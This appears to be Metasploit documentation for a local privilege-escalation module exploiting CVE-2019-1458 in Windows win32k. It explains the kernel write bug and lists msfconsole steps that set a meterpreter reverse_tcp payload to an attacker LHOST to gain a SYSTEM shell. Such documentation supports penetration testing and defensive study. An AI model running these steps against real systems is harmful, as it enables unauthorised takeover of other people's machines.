List of CVEs: CVE-2019-1458
This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability within win32k which occurs due to an uninitalized variable, which allows user mode attackers to write a limited amount of controlled data to an attacker controlled address in kernel memory. By utilizing this vulnerability to execute controlled writes to kernel memory, an attacker can gain arbitrary code execution as the SYSTEM user. This module has been tested against Windows 7 x64 SP1. Offsets within the exploit code may need to be adjusted to work with other versions of Windows. The exploit can only be triggered once against the target and can cause the target machine to reboot when the session is terminated.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Reliability:
- unreliable-session: The module isn't expected to get a shell reliably (such as only once).
Stability:
- crash-os-restarts: Module may crash the OS, but the OS restarts.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt.
Also, to check the session ID, use the sessions
command.
msf > use exploit/windows/local/cve_2019_1458_wizardopium
msf exploit(cve_2019_1458_wizardopium) > show targets

- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
This module exploits CVE-2019-1458, aka WizardOpium, a bug that occurs because a field within the tagSERVERINFO structure at *(gpsi+0x154) was uninitialized, which allowed user mode attackers to set extra window data pointer in a task switch window (designated by the FNID_SWITCH window class), which would otherwise only be able to be set by the kernel. By setting this extra window data pointer, an attacker can write a limited amount of data to an arbitrary kernel address in memory, thus providing them with an arbitrary kernel write primitive than can be used to elevate privileges to SYSTEM.
This module has been tested against Windows 7 x64 SP1. Offsets within the solution may need to be adjusted to work with other versions of Windows.
Verification Steps
- Get a non-SYSTEM meterpreter session on Windows 7 SP1 x64
use exploit/windows/local/cve_2019_1458_wizardopium
set session <session>
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <LHOST>
set LPORT 5555
exploit
- Get a SYSTEM session
